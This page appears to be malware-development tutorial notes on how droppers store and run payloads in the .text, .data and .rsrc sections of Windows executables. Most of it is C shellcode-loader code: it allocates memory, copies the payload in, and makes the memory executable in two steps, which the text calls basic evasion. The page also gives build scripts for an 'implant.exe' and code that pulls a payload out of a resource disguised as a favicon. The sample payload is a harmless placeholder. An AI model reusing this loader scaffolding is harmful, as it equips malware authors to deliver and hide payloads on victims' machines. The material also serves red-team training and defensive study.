Payload Storage
Table of content
Droppers
Specials programs used to deliver the payload to the target machine.
For example, during phishing attack your code is executed on the target machine. This executed code is the dropper. It can be a simple program or a complexe one but the final goal is to deliver the main payload to the machine and execute it.
Where to store payload ?
Payloads can be stored in PE sections. The most used are:
.text.data.rsrc
Text
Code
It must be put in the code of one function (the main for example)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// 4 byte payload
unsigned char payload[] = {
0x90, // NOP
0x90, // NOP
0xcc, // INT3 : give process flow to debugger
0xc3 // RET
};
unsigned int payload_len = 4;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
// This is not done during the first allocation because it is weird that a memory space is RWX at the same time.
// Doing this in two step allow basic evasion.
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
Compile
@ECHO OFF
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
Data
Code
Tell the compiler that the payload is readonly data. The simple way to do that is to create a global variable handling the payload.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// The payload is not declared in the code but linked during compilation
int main(void) {
[...]
}
### Compile
```bat
@ECHO OFF
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
Rsrc
Code
Its a dedicated section to stored other files.
Thus, create a file containing the payload and tell the compiler that this file must be part of the .rsrcsection.
Then the code has to use a specific API to reach out the .rsrc section and extract the payload from their.
int main(void) {
HGLOBAL resHandle = NULL;
HRSRC res;
unsigned char * payload;
unsigned int payload_len;
// Extract payload from resources section
// FindResource ask the system to locate the ressource (FACIVON_ICON) from the PE file
// It return an handle to a ResourceInfoBlock
res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
// Use the ResourceInfoBlock handle and return another handle to the module containing the resource
resHandle = LoadResource(NULL, res);
// Return a pointer to the first byte of the resource
payload = (char *) LockResource(resHandle);
// Return the size of the resource
payload_len = SizeofResource(NULL, res);
Compile
@ECHO OFF
Rem The resource.rc link the type of data to the file containing the data
Rem rc is the ressource compiler and take as argument the ressource file
rc resources.rc
Rem cvtres convert the resource compiled file to an object file that can be undesrtood by the C compiler
cvtres /MACHINE:x64 /OUT:resources.o resources.res
Rem THe compilation include the resource file
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o